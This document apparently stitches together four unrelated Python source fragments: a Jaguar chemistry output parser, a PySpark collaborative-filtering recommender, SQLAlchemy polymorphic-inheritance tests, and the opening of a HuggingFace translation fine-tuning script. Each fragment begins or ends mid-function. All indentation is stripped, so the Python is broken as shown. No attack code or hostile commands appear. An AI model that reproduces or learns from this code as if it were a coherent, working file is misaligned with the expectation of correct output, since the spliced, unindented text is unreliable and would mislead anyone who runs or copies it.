self.homos = numpy.array([occs-1], "i")
self.unrestrictedflag = False
if line[1:28] == "number of occupied orbitals":
self.homos = numpy.array([float(line.strip().split()[-1])-1], "i")
if line[2:27] == "number of basis functions":
nbasis = int(line.strip().split()[-1])
self.set_attribute('nbasis', nbasis)
if line.find("number of alpha occupied orb") > 0:
# Get number of MOs for an unrestricted calc
aoccs = int(line.split()[-1])
line = next(inputfile)
avirts = int(line.split()[-1])
line = next(inputfile)
boccs = int(line.split()[-1])
line = next(inputfile)
bvirt = int(line.split()[-1])
self.nmo = aoccs + avirts
self.homos = numpy.array([aoccs-1, boccs-1], "i")
self.unrestrictedflag = True
if line[0:4] == "etot":
# Get SCF convergence information
if not hasattr(self, "scfvalues"):
self.scfvalues = []
self.scftargets = [[5E-5, 5E-6]]
values = []
while line[0:4] == "etot":
# Jaguar 4.2
# etot 1 N N 0 N -382.08751886450 2.3E-03 1.4E-01
# etot 2 Y Y 0 N -382.27486023153 1.9E-01 1.4E-03 5.7E-02
# Jaguar 6.5
# etot 1 N N 0 N -382.08751881733 2.3E-03 1.4E-01
# etot 2 Y Y 0 N -382.27486018708 1.9E-01 1.4E-03 5.7E-02
temp = line.split()[7:]
if len(temp) == 3:
denergy = float(temp[0])
else:
denergy = 0 # Should really be greater than target value
# or should we just ignore the values in this line
ddensity = float(temp[-2])
maxdiiserr = float(temp[-1])
if not self.geoopt:
values.append([denergy, ddensity])
else:
values.append([ddensity])
try:
line = next(inputfile)
except StopIteration:
self.logger.warning('File terminated before end of last SCF! Last error: {}'.format(maxdiiserr))
break
self.scfvalues.append(values)
# MO energies and symmetries.
# Jaguar 7.0: provides energies and symmetries for both
# restricted and unrestricted calculations, like this:
# Alpha | |
<filename>src/algorithms/cf.py<gh_stars>100-1000
import numpy as np
from src.algorithms import recommender_helpers as rechelp
from pyspark.sql.types import *
from pyspark.mllib.recommendation import ALS
from pyspark.mllib.regression import LabeledPoint
from pyspark.mllib.classification import NaiveBayes
from operator import add
from sklearn.metrics.pairwise import cosine_similarity
def calc_cf_mllib(y_training_data, num_partitions = 20):
"""
Utilizes the ALS collaborative filtering algorithm in MLLib to determine the predicted ratings
Args:
y_training_data: the data used to train the RecSys algorithm in the format of an RDD of [ (userId, itemId, actualRating) ]
Returns:
predicted: predicted ratings in the format of a RDD of [ (userId, itemId, predictedRating) ].
"""
#Predicted values can be anywhere - because we are normalizing the content based algorithms we should likely normalize here
max_rating = y_training_data.map(lambda (user, item, rating): rating).max()
min_rating = y_training_data.map(lambda (user, item, rating): rating).min()
if max_rating == min_rating:
min_rating=0
#MLLIb has two methods, train and trainImplicit(). Implicit data will go between zero and 1
if min_rating==0 and max_rating==1:
model = ALS.trainImplicit(y_training_data, rank = 10, iterations = 5)
else:
model = ALS.train(y_training_data, rank = 10, iterations = 5)
#predict all user, item pairs
item_ids = y_training_data.map(lambda (u,i,r): i).distinct()
user_ids = y_training_data.map(lambda (u,i,r): u).distinct()
user_item_combo = user_ids.cartesian(item_ids).coalesce(num_partitions)
predicted = model.predictAll(user_item_combo.map(lambda x: (x[0], x[1])))
norm_predictions = predicted.map(lambda (user,item,pred): (user,item, rechelp.squish_preds(pred,min_rating,max_rating)))
return norm_predictions
def calc_user_user_cf(training_data, sqlCtx, num_partitions=20):
"""
A very simple user-user CF algorithm in PySpark. Method is less stable than calc_user_user_cf2
Method derived from the Coursera course: Recommender Systems taught by Prof <NAME> (Universitu of Minesota)
and Prof <NAME> (Texas State University)
Args:
y_training_data: the data used to train the RecSys algorithm in the format of an RDD of [ (userId, itemId, actualRating) ]
Returns:
predicted: predicted ratings in the format of a RDD of [ (userId, itemId, predictedRating) ].
"""
user_groups = training_data.groupBy(lambda (user, item, rating): user)
user_groups_sim = user_groups.cartesian(user_groups).map(lambda ((user1_id, user1_rows), (user2_id, user2_rows)):\
(user1_id, user2_id, similarity(user1_rows, user2_rows, 1))).coalesce(num_partitions)
fields = [StructField("user1", LongType(),True),StructField("user2", LongType(), True),\
StructField("similarity", FloatType(), True) ]
schema_sim = StructType(fields)
user_sim = sqlCtx.createDataFrame(user_groups_sim, schema_sim)
user_sim.registerTempTable("user_sim")
fields = [StructField("user", LongType(),True),StructField("item", LongType(), True),\
StructField("rating", FloatType(), True) ]
schema = StructType(fields)
user_sim_sql = sqlCtx.createDataFrame(training_data, schema)
user_sim_sql.registerTempTable("ratings")
avg_ratings = sqlCtx.sql("select user, avg(rating) as avg_rating from ratings group by user")
avg_ratings.registerTempTable("averages")
residual_ratings = sqlCtx.sql("select r.user, r.item, (r.rating-a.avg_rating) as resids from ratings r, \
averages a where a.user=r.user")
residual_ratings.registerTempTable("residuals")
user_sim_resids = sqlCtx.sql("select u.user2, r.user, r.item, r.resids, similarity, r.resids*similarity as r_w from residuals r, \
user_sim u where r.user=u.user1")
user_sim_resids.registerTempTable("user_sim_resids")
item_adjusts = sqlCtx.sql("select user2, item, sum(r_w)/sum(abs(similarity)) as item_adj from user_sim_resids group by user2, item")
item_adjusts.registerTempTable("item_adjusts")
predictions = sqlCtx.sql("select user2 as user, item, (avg_rating +item_adj) as pred_rating \
from item_adjusts i, averages a where a.user=i.user2")
return predictions
def calc_user_user_cf2(training_data, num_partitions=20):
"""
A very simple user-user CF algorithm in PySpark. Method is more stable than calc_user_user_cf
Method derived from the Coursera course: Recommender Systems taught by Prof <NAME> (Universitu of Minesota)
and Prof <NAME> (Texas State University)
Args:
y_training_data: the data used to train the RecSys algorithm in the format of an RDD of [ (userId, itemId, actualRating) ]
Returns:
predicted: predicted ratings in the format of a RDD of [ (userId, itemId, predictedRating) ].
"""
user_groups = training_data.groupBy(lambda (user, item, rating): user)
user_groups_sim = user_groups.cartesian(user_groups).map(lambda ((user1_id, user1_rows), (user2_id, user2_rows)):\
(user1_id, user2_id, similarity(user1_rows, user2_rows, 1))).coalesce(num_partitions)
user_averages = training_data.map(lambda (user, item, rating): (user, (rating))).groupByKey().\
map(lambda (user, ratings): (user, np.mean(list(ratings))))
user_resids = training_data.map(lambda (user, item, rating): (user, (item, rating))).join(user_averages)\
.map(lambda (user, ((item, rating), avg_rating)): (user, (item, rating-avg_rating)))
item_adjustments = user_resids.join(user_groups_sim.map(lambda (u1, u2, sim): (u1, (u2, sim))))\
.map(lambda (u1, ((item, resid), (u2, sim))): ((u2,item), (resid*sim, sim))).\
groupByKey().map(lambda ((user, item), sim_list): (user, item, calc_item_adjust(sim_list)))
predictions = item_adjustments.map(lambda (user, item, item_adj): (user, (item, item_adj))).join(user_averages)\
.map(lambda (user, ((item, item_adj), (avg_rate))): (user, item, avg_rate+item_adj))
#Predicted values can be anywhere - because we are normalizing the content based algorithms we should likely normalize here
max_rating = training_data.map(lambda (user, item, rating): rating).max()
min_rating = training_data.map(lambda (user, item, rating): rating).min()
if max_rating == min_rating:
min_rating=0
norm_predictions = predictions.map(lambda (user,item,pred): (user,item, rechelp.squish_preds(pred,min_rating,max_rating)))
return norm_predictions
def calc_item_adjust(sim_resids):
#data coming into this function is a list of [residual*similarity, similarity] for all user, item paris
#we want to output sum(residual*similarity)/sum(abs(similarity))
sum_r_w = 0
sum_sim = 0
for s in sim_resids:
sum_r_w += s[0]
sum_sim += abs(s[1])
if sum_sim ==0:
return 0
else:
return sum_r_w/float(sum_sim)
def calc_item_item_cf(training_data, num_partitions):
"""
A very simple item-item CF algorithm in PySpark.
Method derived from the Coursera course: Recommender Systems taught by Prof <NAME> (Universitu of Minesota)
and Prof <NAME> (Texas State University)
Args:
y_training_data: the data used to train the RecSys algorithm in the format of an RDD of [ (userId, itemId, actualRating) ]
Returns:
predicted: predicted ratings in the format of a RDD of [ (userId, itemId, predictedRating) ].
"""
item_groups = training_data.groupBy(lambda (user, item, rating): item)
item_similarity = item_groups.cartesian(item_groups).map(lambda ((item1_id, item1_rows), (item2_id, item2_rows)):\
(item1_id, item2_id, similarity(item1_rows, item2_rows, 0))).coalesce(num_partitions)
user_item_sim = training_data.keyBy(lambda (user, item, rating): item)\
.join(item_similarity.keyBy(lambda (item1, item2, sim): item1))\
.map(lambda (item_id,((user, item, rating),(item1, item2, sim))):((user, item2), (item,rating,sim)))\
.filter(lambda ((user, item2), (item,rating,sim)): item2!=item)
predictions = user_item_sim.groupByKey()\
.map(lambda ((user, item), rows): (user, item, get_item_prob(rows)))
#Predicted values can be anywhere - because we are normalizing the content based algorithms we should likely normalize here
max_rating = training_data.map(lambda (user, item, rating): rating).max()
min_rating = training_data.map(lambda (user, item, rating): rating).min()
if max_rating == min_rating:
min_rating=0
norm_predictions = predictions.map(lambda (user,item,pred): (user,item, rechelp.squish_preds(pred,min_rating,max_rating)))
return norm_predictions
def similarity(item1_rows, item2_rows, index):
#to determine user similarity index=0
#to determine item similarity index=1
rating_match = []
for i in item1_rows:
for j in item2_rows:
if i[index]==j[index]:
rating_match.append((i[2],j[2]))
if len(rating_match)==0:
sim = 0.0
else:
sim = cosine_similarity(*zip(*rating_match))[0][0]
return float(sim)
def get_item_prob(rows):
nom = 0
denom = 0
for r in rows:
nom += r[1]*r[2]
denom += abs(r[2])
if denom ==0:
return 0
else:
item_prob = nom/float(denom)
return float(item_prob)
def calc_naive_bayes_using_pyspark(training_data, num_partitions=20):
"""
Determine the predicted rating of every user-item combination using MLlib's Naive Bayes algorithm.
Args:
training_data: the data used to train the RecSys algorithm in the format of a RDD of [ (userId, itemId, actualRating) ]
Returns:
predictions: predicted ratings of every user-item combination in the format of a RDD of [(userId, itemId, predictedRating)].
"""
# to use MLlib's Naive Bayes model, it requires the input to be in a format of a LabeledPoint
# therefore, convert dataset so that it will in the format [(rating, (user, item))]
r_ui_train = training_data.map(lambda (u,i,r): LabeledPoint(r, (u, i)))
# train Naive Bayes model
naiveBayesModel = NaiveBayes.train(r_ui_train, lambda_=1.0)
# predict on all user-item pairs
user_ids = training_data.map(lambda (u,i,r): u).distinct()
item_ids = training_data.map(lambda (u,i,r): i).distinct()
ui_combo = user_ids.cartesian(item_ids).coalesce(num_partitions)
r_ui_combo = ui_combo.map(lambda (u,i,r): LabeledPoint(1, (u, i)))
# make prediction
predictions = r_ui_combo.map(lambda p: (p.features[0], p.features[1], naiveBayesModel.predict(p.features)))
return predictions
def calc_naive_bayes_components(training_data, sc, num_partitions=20):
"""
Helper function that will compute the necessary components needed by:
calc_naive_bayes_map(), calc_naive_bayes_mse(), calc_naive_bayes_mae()
Args:
training_data: the data used to train the RecSys algorithm in the format of a RDD of [ (userId, itemId, actualRating) ]
sc: spark context
Returns:
ui_allBayesProb: computation of all bayes probability for each user-item pairs in the format [((userId, itemId), (rating, bayesProbability)]
"""
# create RDD for range of ratings, ie. [1, 2, 3, 4, 5] for ratings 1-5
min_rating = training_data.map(lambda (u,i,r): r).min()
max_rating = training_data.map(lambda (u,i,r): r).max()
range_of_ratings = sc.broadcast(list(range(int(min_rating), int(max_rating + 1))))
#predict on all user-item pairs
user_ids = training_data.map(lambda (u,i,r): u).distinct()
item_ids = training_data.map(lambda (u,i,r): i).distinct()
ui_combo = user_ids.cartesian(item_ids).coalesce(num_partitions)
# since we have to determine the probability of rating r for each user and item,
# we have to create a RDD with [(rating, (user, item))] for each rating
# ie. [(rating_1, (user, item)), (rating_2, (user, item)), (rating_3, (user, item)), ..., (rating_5, (user, item))]
# do not combine rCombo_ui into uirCombo since rCombo_ui will be used later on
rCombo_ui = ui_combo.flatMap(lambda (u,i): [(float(r), (u, i)) for r in range_of_ratings.value]).coalesce(num_partitions)
uirCombo = rCombo_ui.map(lambda (r, (u,i)): (u, i, r))
"""
Calculate P(r|u), probability of rating r for user u.
P(r|u) = (number of ratings r that user u gives) / (total number of ratings that user u gives)
For example, if rating r == 1, then
P(r|u) | |
the moment so do some heuristics to find it.
parent_mapper = inspect(Parent)
for prop in parent_mapper.column_attrs:
if not prop.instrument:
break
else:
prop = parent_mapper._columntoproperty[
parent_mapper.polymorphic_on
]
# then make sure the column we will query on matches.
is_(parent_mapper.polymorphic_on, prop.columns[0])
if set_event:
@event.listens_for(Parent, "init", propagate=True)
def set_identity(instance, *arg, **kw):
ident = object_mapper(instance).polymorphic_identity
if ident == "parent":
instance.x = parent_ident
elif ident == "child":
instance.x = child_ident
else:
assert False, "Got unexpected identity %r" % ident
s = Session(testing.db)
s.add_all([Parent(q="p1"), Child(q="c1", y="c1"), Parent(q="p2")])
s.commit()
s.close()
eq_(
[type(t) for t in s.query(Parent).order_by(Parent.id)],
[Parent, Child, Parent],
)
eq_([type(t) for t in s.query(Child).all()], [Child])
class SortOnlyOnImportantFKsTest(fixtures.MappedTest):
@classmethod
def define_tables(cls, metadata):
Table(
"a",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column(
"b_id",
Integer,
ForeignKey("b.id", use_alter=True, name="b_fk"),
),
)
Table(
"b",
metadata,
Column("id", Integer, ForeignKey("a.id"), primary_key=True),
)
@classmethod
def setup_classes(cls):
Base = declarative_base()
class A(Base):
__tablename__ = "a"
id = Column(
Integer, primary_key=True, test_needs_autoincrement=True
)
b_id = Column(Integer, ForeignKey("b.id"))
class B(A):
__tablename__ = "b"
id = Column(Integer, ForeignKey("a.id"), primary_key=True)
__mapper_args__ = {"inherit_condition": id == A.id}
cls.classes.A = A
cls.classes.B = B
def test_flush(self):
s = Session(testing.db)
s.add(self.classes.B())
s.flush()
class FalseDiscriminatorTest(fixtures.MappedTest):
@classmethod
def define_tables(cls, metadata):
global t1
t1 = Table(
"t1",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("type", Boolean, nullable=False),
)
def test_false_on_sub(self):
class Foo(object):
pass
class Bar(Foo):
pass
mapper(Foo, t1, polymorphic_on=t1.c.type, polymorphic_identity=True)
mapper(Bar, inherits=Foo, polymorphic_identity=False)
sess = create_session()
b1 = Bar()
sess.add(b1)
sess.flush()
assert b1.type is False
sess.expunge_all()
assert isinstance(sess.query(Foo).one(), Bar)
def test_false_on_base(self):
class Ding(object):
pass
class Bat(Ding):
pass
mapper(Ding, t1, polymorphic_on=t1.c.type, polymorphic_identity=False)
mapper(Bat, inherits=Ding, polymorphic_identity=True)
sess = create_session()
d1 = Ding()
sess.add(d1)
sess.flush()
assert d1.type is False
sess.expunge_all()
assert sess.query(Ding).one() is not None
class PolymorphicSynonymTest(fixtures.MappedTest):
@classmethod
def define_tables(cls, metadata):
global t1, t2
t1 = Table(
"t1",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("type", String(10), nullable=False),
Column("info", String(255)),
)
t2 = Table(
"t2",
metadata,
Column("id", Integer, ForeignKey("t1.id"), primary_key=True),
Column("data", String(10), nullable=False),
)
def test_polymorphic_synonym(self):
class T1(fixtures.ComparableEntity):
def info(self):
return "THE INFO IS:" + self._info
def _set_info(self, x):
self._info = x
info = property(info, _set_info)
class T2(T1):
pass
mapper(
T1,
t1,
polymorphic_on=t1.c.type,
polymorphic_identity="t1",
properties={"info": synonym("_info", map_column=True)},
)
mapper(T2, t2, inherits=T1, polymorphic_identity="t2")
sess = create_session()
at1 = T1(info="at1")
at2 = T2(info="at2", data="t2 data")
sess.add(at1)
sess.add(at2)
sess.flush()
sess.expunge_all()
eq_(sess.query(T2).filter(T2.info == "at2").one(), at2)
eq_(at2.info, "THE INFO IS:at2")
class PolymorphicAttributeManagementTest(fixtures.MappedTest):
"""Test polymorphic_on can be assigned, can be mirrored, etc."""
run_setup_mappers = "once"
@classmethod
def define_tables(cls, metadata):
Table(
"table_a",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("class_name", String(50)),
)
Table(
"table_b",
metadata,
Column("id", Integer, ForeignKey("table_a.id"), primary_key=True),
Column("class_name", String(50)),
)
Table(
"table_c",
metadata,
Column("id", Integer, ForeignKey("table_b.id"), primary_key=True),
Column("data", String(10)),
)
@classmethod
def setup_classes(cls):
table_b, table_c, table_a = (
cls.tables.table_b,
cls.tables.table_c,
cls.tables.table_a,
)
class A(cls.Basic):
pass
class B(A):
pass
class C(B):
pass
class D(B):
pass
mapper(
A,
table_a,
polymorphic_on=table_a.c.class_name,
polymorphic_identity="a",
)
mapper(
B,
table_b,
inherits=A,
polymorphic_on=table_b.c.class_name,
polymorphic_identity="b",
properties=dict(
class_name=[table_a.c.class_name, table_b.c.class_name]
),
)
mapper(C, table_c, inherits=B, polymorphic_identity="c")
mapper(D, inherits=B, polymorphic_identity="d")
def test_poly_configured_immediate(self):
A, C, B = (self.classes.A, self.classes.C, self.classes.B)
a = A()
b = B()
c = C()
eq_(a.class_name, "a")
eq_(b.class_name, "b")
eq_(c.class_name, "c")
def test_base_class(self):
A, C, B = (self.classes.A, self.classes.C, self.classes.B)
sess = Session()
c1 = C()
sess.add(c1)
sess.commit()
assert isinstance(sess.query(B).first(), C)
sess.close()
assert isinstance(sess.query(A).first(), C)
def test_valid_assignment_upwards(self):
"""test that we can assign 'd' to a B, since B/D
both involve the same set of tables.
"""
D, B = self.classes.D, self.classes.B
sess = Session()
b1 = B()
b1.class_name = "d"
sess.add(b1)
sess.commit()
sess.close()
assert isinstance(sess.query(B).first(), D)
def test_invalid_assignment_downwards(self):
"""test that we warn on assign of 'b' to a C, since this adds
a row to the C table we'd never load.
"""
C = self.classes.C
sess = Session()
c1 = C()
c1.class_name = "b"
sess.add(c1)
assert_raises_message(
sa_exc.SAWarning,
"Flushing object %s with incompatible "
"polymorphic identity 'b'; the object may not "
"refresh and/or load correctly" % instance_str(c1),
sess.flush,
)
def test_invalid_assignment_upwards(self):
"""test that we warn on assign of 'c' to a B, since we will have a
"C" row that has no joined row, which will cause object
deleted errors.
"""
B = self.classes.B
sess = Session()
b1 = B()
b1.class_name = "c"
sess.add(b1)
assert_raises_message(
sa_exc.SAWarning,
"Flushing object %s with incompatible "
"polymorphic identity 'c'; the object may not "
"refresh and/or load correctly" % instance_str(b1),
sess.flush,
)
def test_entirely_oob_assignment(self):
"""test warn on an unknown polymorphic identity."""
B = self.classes.B
sess = Session()
b1 = B()
b1.class_name = "xyz"
sess.add(b1)
assert_raises_message(
sa_exc.SAWarning,
"Flushing object %s with incompatible "
"polymorphic identity 'xyz'; the object may not "
"refresh and/or load correctly" % instance_str(b1),
sess.flush,
)
def test_not_set_on_upate(self):
C = self.classes.C
sess = Session()
c1 = C()
sess.add(c1)
sess.commit()
sess.expire(c1)
c1.data = "foo"
sess.flush()
def test_validate_on_upate(self):
C = self.classes.C
sess = Session()
c1 = C()
sess.add(c1)
sess.commit()
sess.expire(c1)
c1.class_name = "b"
assert_raises_message(
sa_exc.SAWarning,
"Flushing object %s with incompatible "
"polymorphic identity 'b'; the object may not "
"refresh and/or load correctly" % instance_str(c1),
sess.flush,
)
class CascadeTest(fixtures.MappedTest):
"""that cascades on polymorphic relationships continue
cascading along the path of the instance's mapper, not
the base mapper."""
@classmethod
def define_tables(cls, metadata):
global t1, t2, t3, t4
t1 = Table(
"t1",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("data", String(30)),
)
t2 = Table(
"t2",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("t1id", Integer, ForeignKey("t1.id")),
Column("type", String(30)),
Column("data", String(30)),
)
t3 = Table(
"t3",
metadata,
Column("id", Integer, ForeignKey("t2.id"), primary_key=True),
Column("moredata", String(30)),
)
t4 = Table(
"t4",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("t3id", Integer, ForeignKey("t3.id")),
Column("data", String(30)),
)
def test_cascade(self):
class T1(fixtures.BasicEntity):
pass
class T2(fixtures.BasicEntity):
pass
class T3(T2):
pass
class T4(fixtures.BasicEntity):
pass
mapper(T1, t1, properties={"t2s": relationship(T2, cascade="all")})
mapper(T2, t2, polymorphic_on=t2.c.type, polymorphic_identity="t2")
mapper(
T3,
t3,
inherits=T2,
polymorphic_identity="t3",
properties={"t4s": relationship(T4, cascade="all")},
)
mapper(T4, t4)
sess = create_session()
t1_1 = T1(data="t1")
t3_1 = T3(data="t3", moredata="t3")
t2_1 = T2(data="t2")
t1_1.t2s.append(t2_1)
t1_1.t2s.append(t3_1)
t4_1 = T4(data="t4")
t3_1.t4s.append(t4_1)
sess.add(t1_1)
assert t4_1 in sess.new
sess.flush()
sess.delete(t1_1)
assert t4_1 in sess.deleted
sess.flush()
class M2OUseGetTest(fixtures.MappedTest):
@classmethod
def define_tables(cls, metadata):
Table(
"base",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("type", String(30)),
)
Table(
"sub",
metadata,
Column("id", Integer, ForeignKey("base.id"), primary_key=True),
)
Table(
"related",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("sub_id", Integer, ForeignKey("sub.id")),
)
def test_use_get(self):
base, sub, related = (
self.tables.base,
self.tables.sub,
self.tables.related,
)
# test [ticket:1186]
class Base(fixtures.BasicEntity):
pass
class Sub(Base):
pass
class Related(Base):
pass
mapper(
Base, base, polymorphic_on=base.c.type, polymorphic_identity="b"
)
mapper(Sub, sub, inherits=Base, polymorphic_identity="s")
mapper(
Related,
related,
properties={
# previously, this was needed for the comparison to occur:
# the 'primaryjoin' looks just like "Sub"'s "get" clause
# (based on the Base id), and foreign_keys since that join
# condition doesn't actually have any fks in it
# 'sub':relationship(Sub,
# primaryjoin=base.c.id==related.c.sub_id,
# foreign_keys=related.c.sub_id)
# now we can use this:
"sub": relationship(Sub)
},
)
assert class_mapper(Related).get_property("sub").strategy.use_get
sess = create_session()
s1 = Sub()
r1 = Related(sub=s1)
sess.add(r1)
sess.flush()
sess.expunge_all()
r1 = sess.query(Related).first()
s1 = sess.query(Sub).first()
def go():
assert r1.sub
self.assert_sql_count(testing.db, go, 0)
class GetTest(fixtures.MappedTest):
@classmethod
def define_tables(cls, metadata):
global foo, bar, blub
foo = Table(
"foo",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("type", String(30)),
Column("data", String(20)),
)
bar = Table(
"bar",
metadata,
Column("id", Integer, ForeignKey("foo.id"), primary_key=True),
Column("bar_data", String(20)),
)
blub = Table(
"blub",
metadata,
Column(
"blub_id",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("foo_id", Integer, ForeignKey("foo.id")),
Column("bar_id", Integer, ForeignKey("bar.id")),
Column("blub_data", String(20)),
)
@classmethod
def setup_classes(cls):
class Foo(cls.Basic):
pass
class Bar(Foo):
pass
class Blub(Bar):
pass
def test_get_polymorphic(self):
self._do_get_test(True)
def test_get_nonpolymorphic(self):
self._do_get_test(False)
def _do_get_test(self, polymorphic):
foo, Bar, Blub, blub, bar, Foo = (
self.tables.foo,
self.classes.Bar,
self.classes.Blub,
self.tables.blub,
self.tables.bar,
self.classes.Foo,
)
if polymorphic:
mapper(
Foo, foo, polymorphic_on=foo.c.type, polymorphic_identity="foo"
)
mapper(Bar, bar, inherits=Foo, polymorphic_identity="bar")
mapper(Blub, blub, inherits=Bar, polymorphic_identity="blub")
else:
mapper(Foo, foo)
mapper(Bar, bar, inherits=Foo)
mapper(Blub, blub, inherits=Bar)
sess = create_session()
f = Foo()
b = Bar()
bl = Blub()
sess.add(f)
sess.add(b)
sess.add(bl)
sess.flush()
if polymorphic:
def go():
assert sess.query(Foo).get(f.id) is f
assert sess.query(Foo).get(b.id) is b
assert sess.query(Foo).get(bl.id) is bl
assert sess.query(Bar).get(b.id) is b
assert sess.query(Bar).get(bl.id) is bl
assert sess.query(Blub).get(bl.id) is bl
# test class mismatches - item is present
# in the identity map but we requested a subclass
| |
<reponame>cdleong/transformers
#!/usr/bin/env python
# coding=utf-8
# Copyright The HuggingFace Team and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fine-tuning the library models for sequence to sequence.
"""
# You can also adapt this script on your own sequence to sequence task. Pointers for this are left as comments.
import logging
import os
import sys
from dataclasses import dataclass, field
from typing import Optional
import numpy as np
from datasets import load_dataset, load_metric
import transformers
from transformers import (
AutoConfig,
AutoModelForSeq2SeqLM,
AutoTokenizer,
DataCollatorForSeq2Seq,
HfArgumentParser,
M2M100Tokenizer,
MBart50Tokenizer,
MBart50TokenizerFast,
MBartTokenizer,
MBartTokenizerFast,
Seq2SeqTrainer,
Seq2SeqTrainingArguments,
default_data_collator,
set_seed,
)
from transformers.trainer_utils import get_last_checkpoint
from transformers.utils import check_min_version
from transformers.utils.versions import require_version
# Will error if the minimal version of Transformers is not installed. Remove at your own risks.
check_min_version("4.8.0.dev0")
require_version("datasets>=1.8.0", "To fix: pip install -r examples/pytorch/translation/requirements.txt")
logger = logging.getLogger(__name__)
# A list of all multilingual tokenizer which require src_lang and tgt_lang attributes.
MULTILINGUAL_TOKENIZERS = [MBartTokenizer, MBartTokenizerFast, MBart50Tokenizer, MBart50TokenizerFast, M2M100Tokenizer]
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.
"""
model_name_or_path: str = field(
metadata={"help": "Path to pretrained model or model identifier from huggingface.co/models"}
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
cache_dir: Optional[str] = field(
default=None,
metadata={"help": "Where to store the pretrained models downloaded from huggingface.co"},
)
use_fast_tokenizer: bool = field(
default=True,
metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."},
)
model_revision: str = field(
default="main",
metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
)
use_auth_token: bool = field(
default=False,
metadata={
"help": "Will use the token generated when running `transformers-cli login` (necessary to use this script "
"with private models)."
},
)
@dataclass
class DataTrainingArguments:
"""
Arguments pertaining to what data we are going to input our model for training and eval.
"""
source_lang: str = field(default=None, metadata={"help": "Source language id for translation."})
target_lang: str = field(default=None, metadata={"help": "Target language id for translation."})
dataset_name: Optional[str] = field(
default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."}
)
dataset_config_name: Optional[str] = field(
default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."}
)
train_file: Optional[str] = field(default=None, metadata={"help": "The input training data file (a jsonlines)."})
validation_file: Optional[str] = field(
default=None,
metadata={
"help": "An optional input evaluation data file to evaluate the metrics (sacreblue) on "
"a jsonlines file."
},
)
test_file: Optional[str] = field(
default=None,
metadata={
"help": "An optional input test data file to evaluate the metrics (sacreblue) on " "a jsonlines file."
},
)
overwrite_cache: bool = field(
default=False, metadata={"help": "Overwrite the cached training and evaluation sets"}
)
preprocessing_num_workers: Optional[int] = field(
default=None,
metadata={"help": "The number of processes to use for the preprocessing."},
)
max_source_length: Optional[int] = field(
default=1024,
metadata={
"help": "The maximum total input sequence length after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded."
},
)
max_target_length: Optional[int] = field(
default=128,
metadata={
"help": "The maximum total sequence length for target text after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded."
},
)
val_max_target_length: Optional[int] = field(
default=None,
metadata={
"help": "The maximum total sequence length for validation target text after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded. Will default to `max_target_length`."
"This argument is also used to override the ``max_length`` param of ``model.generate``, which is used "
"during ``evaluate`` and ``predict``."
},
)
pad_to_max_length: bool = field(
default=False,
metadata={
"help": "Whether to pad all samples to model maximum sentence length. "
"If False, will pad the samples dynamically when batching to the maximum length in the batch. More "
"efficient on GPU but very bad for TPU."
},
)
max_train_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of training examples to this "
"value if set."
},
)
max_eval_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of evaluation examples to this "
"value if set."
},
)
max_predict_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of prediction examples to this "
"value if set."
},
)
num_beams: Optional[int] = field(
default=None,
metadata={
"help": "Number of beams to use for evaluation. This argument will be passed to ``model.generate``, "
"which is used during ``evaluate`` and ``predict``."
},
)
ignore_pad_token_for_loss: bool = field(
default=True,
metadata={
"help": "Whether to ignore the tokens corresponding to padded labels in the loss computation or not."
},
)
source_prefix: Optional[str] = field(
default=None, metadata={"help": "A prefix to add before every source text (useful for T5 models)."}
)
forced_bos_token: Optional[str] = field(
default=None,
metadata={
"help": "The token to force as the first generated token after the :obj:`decoder_start_token_id`."
"Useful for multilingual models like :doc:`mBART <../model_doc/mbart>` where the first generated token "
"needs to be the target language token.(Usually it is the target language token)"
},
)
def __post_init__(self):
if self.dataset_name is None and self.train_file is None and self.validation_file is None:
raise ValueError("Need either a dataset name or a training/validation file.")
elif self.source_lang is None or self.target_lang is None:
raise ValueError("Need to specify the source language and the target language.")
if self.train_file is not None:
extension = self.train_file.split(".")[-1]
assert extension == "json", "`train_file` should be a json file."
if self.validation_file is not None:
extension = self.validation_file.split(".")[-1]
assert extension == "json", "`validation_file` should be a json file."
if self.val_max_target_length is None:
self.val_max_target_length = self.max_target_length
def main():
# See all possible arguments in src/transformers/training_args.py
# or by passing the --help flag to this script.
# We now keep distinct sets of args, for a cleaner separation of concerns.
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, Seq2SeqTrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
